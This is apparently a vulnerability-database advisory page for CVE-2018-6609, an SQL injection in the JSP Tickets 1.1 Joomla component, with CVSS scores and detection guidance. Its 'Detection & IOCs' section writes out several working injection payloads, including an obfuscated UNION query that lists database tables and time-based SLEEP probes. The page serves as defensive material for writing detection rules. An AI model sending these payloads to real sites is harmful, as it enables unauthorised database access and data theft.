cbcvebase.
CVE-2018-6609
published 2018-02-05

CVE-2018-6609: SQL Injection exists in the JSP Tickets 1.1 component for Joomla! via the ticketcode parameter in a ticketlist edit action, or the id parameter in a statuslist…

PriorityP261critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
2.70%
84.1th percentile
SQL Injection exists in the JSP Tickets 1.1 component for Joomla! via the ticketcode parameter in a ticketlist edit action, or the id parameter in a statuslist (or prioritylist) edit action.

Affected

1 ranges
VendorProductVersion rangeFixed in
jsp_tickets_projectjsp_tickets

Detection & IOCsextracted from sources · hover to see the quote

urlindex.php?option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=[SQL]
urlindex.php?option=com_jsptickets&controller=statuslist&task=edit&id=[SQL]
urlindex.php?option=com_jsptickets&controller=prioritylist&task=edit&id=[SQL]
command-66' /*!07777UNION*/ /*!07777SELECT*/ nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,/*!07777CONCAT*/((/*!07777SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!07777FROM*/+INFORMATION_SCHEMA.TABLES+/*!07777WHERE*/+TABLE_SCHEMA=DATABASE())),nUlL,nUlL,nUlL,nUlL--+VerAyari
commandoption=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND 5298=5298 AND 'okLe'='okLe
commandoption=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x717a6a7871,(SELECT (ELT(8072=8072,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FwvD'='FwvD
commandoption=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND SLEEP(5) AND 'Ozir'='Ozir
commandoption=com_jsptickets&controller=ticketlist&task=edit&ticketcode=-4507' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7871,0x72476c507a64564861484f575645536355695958564f4c4e6858625061774a6b59796b6571746249,0x717a706a71),NULL,NULL,NULL,NULL-- fcOG
commandoption=com_jsptickets&controller=statuslist&task=edit&id=4 AND SLEEP(5)
commandoption=com_jsptickets&controller=prioritylist&task=edit&id=1 OR SLEEP(5)
  • Monitor GET requests targeting `option=com_jsptickets` with `controller=ticketlist&task=edit` and inspect the `ticketcode` parameter for SQL metacharacters (quotes, UNION, SLEEP, comment sequences).
  • Monitor GET requests targeting `option=com_jsptickets` with `controller=statuslist&task=edit` or `controller=prioritylist&task=edit` and inspect the `id` parameter for SQL injection payloads.
  • Detect MySQL comment-obfuscated UNION injection pattern `/*!07777UNION*/` and `/*!07777SELECT*/` in HTTP query strings targeting the JSP Tickets component.
  • Alert on time-based blind SQLi probes: presence of `SLEEP(5)` in the `ticketcode`, `id` parameters of com_jsptickets requests, combined with abnormal response latency.
  • Detect error-based SQLi using FLOOR(RAND(0)*2) with INFORMATION_SCHEMA.PLUGINS GROUP BY in requests to com_jsptickets endpoints.
  • ·All exploit payloads target version 1.1 of the JSP Tickets component specifically; other versions are not confirmed vulnerable.
  • ·The PoC URLs use `localhost` as a placeholder; the actual target path (`[PATH]`) must be substituted with the real Joomla installation path when writing detection signatures.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.